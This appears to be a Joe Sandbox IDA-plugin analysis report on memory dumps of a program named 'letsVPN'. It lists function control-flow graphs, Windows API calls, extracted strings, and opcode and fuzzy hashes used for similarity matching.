• Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: Console$ErrorLastModeRead_dosmaperr_errno_invalid_parameter_noinfo_isattyfree
• String ID:
• API String ID: 639220483-0

Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                                                                                                                    • API String ID: 0-3034790606
                                                                                                                                                                                                    • Opcode ID: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction ID: 14882d1e0d26957d55fa102c130c097a1d26e38a24c7715c8a635e70eca5937d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B816E36208A8986FBA6DB2494483EE33A0F74E7D4F84C112FA5A476D5DF75C75E8301

                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph; first node 1800246dc-1800246e8; named API calls in the graph: GetFileType]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileHandleLast_dosmaperr_errno$AddressCloseModuleProcType__create
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 4140100140-727254517
                                                                                                                                                                                                    • Opcode ID: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction ID: 21a8e73e1044da5ed91c5e9c3d813a1c520d1f5f3831f37e1cb40251bc97187f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69217137715A0886EB93DBA4E4953ED3360B78ABA8F508615F96A9B7D5CF38C5088700

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$Exit$AddressCurrentErrorLastLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 2428457010-2819208100
                                                                                                                                                                                                    • Opcode ID: fee9cba81f1d1c049b8ac0eea73f063606bad3971b49f0536e145ed6bcea3514
                                                                                                                                                                                                    • Instruction ID: f640b3e516520a919b36208c94240b60ea9876430bbdb97ff192dd507527698d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fee9cba81f1d1c049b8ac0eea73f063606bad3971b49f0536e145ed6bcea3514
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A015E30708B4996FFDBAB75A8443E953A16B4EBC1F44C429B84A46796EE3D870C8310

                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph; first node 1800084d0-1800084ed; named API calls in the graph: PathFileExistsW, CreateFileW, WideCharToMultiByte, WriteFile]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$ByteCharCloseCreateHandleMultiWide$ExistsPathWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3442908436-0
                                                                                                                                                                                                    • Opcode ID: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction ID: bc84bb0ade42bd10d81e598d42a7d6411edb22724f2ff8f25fe5d380946b77e8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53316072614B4847FBA5DF15A44879A7791F79DBF4F048324BAAA07AD5CF7CC2088B04

                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph; first node 180012545-180012556; no named API calls in the graph]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_callnewh$AllocHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2989141601-0
                                                                                                                                                                                                    • Opcode ID: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction ID: 2ba802d8fde8188c932a9ee185128103f4f97c31fd93188f9c8e6f85ebd482bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF118230601F8C86FBE7A7A1A5917E86651AB8CBF0F04C620BA15067C2EE7886988710

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CloseCodeExitHandleObjectProcessSingleWait_dosmaperr_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4283748043-0
                                                                                                                                                                                                    • Opcode ID: c95c02961cc194df7dfc83e827ea4e74a839e4b131e4c3f36add82e81babb2aa
                                                                                                                                                                                                    • Instruction ID: 88746e5f5ece916c4c2f1eca854d168e225486084e5c7e04883772d133e6b958
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c95c02961cc194df7dfc83e827ea4e74a839e4b131e4c3f36add82e81babb2aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A014C31609A4883FBE36F25A5943AC6361AF4DBF0F90C214FA66066D4DF28C6499701

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 1340 180009aca-180009ad3 GetFileAttributesW 1341 180009ad5-180009ada CreateDirectoryW 1340->1341 1342 180009ae0-180009ae6 1340->1342 1341->1342 1343 180009b91-180009bb3 call 180012200 1342->1343 1344 180009aec-180009aef 1342->1344 1346 180009af2-180009b0b 1344->1346 1350 180009b0d-180009b10 1346->1350 1351 180009b12-180009b36 call 180010400 1350->1351 1352 180009b50-180009b58 1350->1352 1351->1352 1359 180009bb4 call 180012780 1351->1359 1354 180009b67-180009b82 call 180012830 GetFileAttributesW 1352->1354 1355 180009b5a-180009b62 call 18001285c 1352->1355 1354->1343 1361 180009b84-180009b8b CreateDirectoryW 1354->1361 1355->1354 1361->1343
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesCreateDirectoryFile$wcscatwcscpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4269979241-0
                                                                                                                                                                                                    • Opcode ID: 69e89a8265683c7f324991ffcd15ebdcd80ba550b9a02bc2d334df5dfaf67a94
                                                                                                                                                                                                    • Instruction ID: 902337c518d8cfbd194fdc28dbe7ec504bcb61d07c762cc6d237d0d59feab74b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69e89a8265683c7f324991ffcd15ebdcd80ba550b9a02bc2d334df5dfaf67a94
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8221A47120594841FEA2DB55A5A43FA7351BB8DBE4F848221FF9A429D5DF2CC74AC304

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 1363 180009a9c-180009ae6 1365 180009b91-180009bb3 call 180012200 1363->1365 1366 180009aec-180009aef 1363->1366 1368 180009af2-180009b0b 1366->1368 1372 180009b0d-180009b10 1368->1372 1373 180009b12-180009b36 call 180010400 1372->1373 1374 180009b50-180009b58 1372->1374 1373->1374 1381 180009bb4 call 180012780 1373->1381 1376 180009b67-180009b82 call 180012830 GetFileAttributesW 1374->1376 1377 180009b5a-180009b62 call 18001285c 1374->1377 1376->1365 1383 180009b84-180009b8b CreateDirectoryW 1376->1383 1377->1376 1383->1365
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b746bd5d8d546c3e46b26d5fffc3ec12d2bafe3fd99919c886d71bc6d71907c3
                                                                                                                                                                                                    • Instruction ID: bb4cf8d93bbf9cc6e2ba9141ee1deb4e8242243cebc2ec3432d515e8a9c1d0ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b746bd5d8d546c3e46b26d5fffc3ec12d2bafe3fd99919c886d71bc6d71907c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A21A475205A8841FEA2DB51A5643FAB351BB8CBD8F448121FB8D06AD9EF2CC75AC704
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep$Count64Tick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2406120688-0
                                                                                                                                                                                                    • Opcode ID: c0c22c2c1a5e76ecd7b74dd1cf3ec3cfc78094375de2df049903c45216d92349
                                                                                                                                                                                                    • Instruction ID: 92bd6339b58cb285b0f30baeb0f528f25b43fd05f0c0e39d9b1d2ed948a9e1d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0c22c2c1a5e76ecd7b74dd1cf3ec3cfc78094375de2df049903c45216d92349
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E0D83571044943FB9E6BB66C893E42242A74D3A1F08C738FD22C53D1CD28968D0300
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: Wininet.dll
                                                                                                                                                                                                    • API String ID: 1029625771-1097394720
                                                                                                                                                                                                    • Opcode ID: ed853e58cac82df4465cd12f77fdbce7e76860c75398a916c4f7a54753ede6d9
                                                                                                                                                                                                    • Instruction ID: 073e485c13a7e7b27ab9e0a86162a95eb8d7bb4fc7f8916facea9738f35552a7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed853e58cac82df4465cd12f77fdbce7e76860c75398a916c4f7a54753ede6d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC04838A66E18D6E796AB05AC8938423A2A35D350FD08010800981220AE6C92AE8704
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4082711253-0
                                                                                                                                                                                                    • Opcode ID: 184cb7061c3642203eff8c54a320cb8dbe641d72029d754cca35c4258ce58e64
                                                                                                                                                                                                    • Instruction ID: feab0ae93b2b30bbcc2224f3f5fcba4d06cd33ee75b1b09efc6b2fb10b5be483
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 184cb7061c3642203eff8c54a320cb8dbe641d72029d754cca35c4258ce58e64
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0115E32228A8492EB61DF61E9943DAB360FB8C784F805115FB8D07A59DF7CC3588B40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                    • Opcode ID: 9666489a833a73eff41d0b3baec99d27baec5b800e83a14c7402f0aa1abc0318
                                                                                                                                                                                                    • Instruction ID: acc06959da3d9712720987d0b20ddc4dba30eb22f803056048d3d8fea3528b98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9666489a833a73eff41d0b3baec99d27baec5b800e83a14c7402f0aa1abc0318
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E111AC72710AA887E745CB16D540B987BA0B388FC0F18C126EF4843755CF74D959CB40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsstr$File$Time$ByteCharLocalMultiPointerWidewcscpy
                                                                                                                                                                                                    • String ID: /../$/..\$\../$\..\
                                                                                                                                                                                                    • API String ID: 2997815599-3885502717
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _invoke_watson$wcscspn
                                                                                                                                                                                                    • String ID: .$_.,
                                                                                                                                                                                                    • API String ID: 1707156713-3384562259
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess_errno_lseeki64_nolock_setmode_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 225511624-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2227589648.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.2227538138.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2227693863.00000001400B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2227715494.00000001400B4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2227715494.0000000140AB4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2229116730.0000000140E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2229334963.00000001410C1000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2229334963.0000000141AC1000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2231362311.0000000141F7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2231385330.0000000141F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_140000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000DE73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid block type$invalid stored block lengths$too many length or distance symbols
                                                                                                                                                                                                    • API String ID: 0-26694007
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ConsoleFileWrite_errno$ByteCharModeMultiWide_getptd_getptd_noexit_invalid_parameter_noinfo_isatty_lseeki64_nolockisleadbyte
                                                                                                                                                                                                    • String ID: U$p^f
                                                                                                                                                                                                    • API String ID: 3520455412-3998816472
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$Handle_lseeki64_nolock$CloseErrorLast_close_nolock_dosmaperr_errno_free_osfhnd$File__create_set_osfhnd_write
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 1668876506-727254517
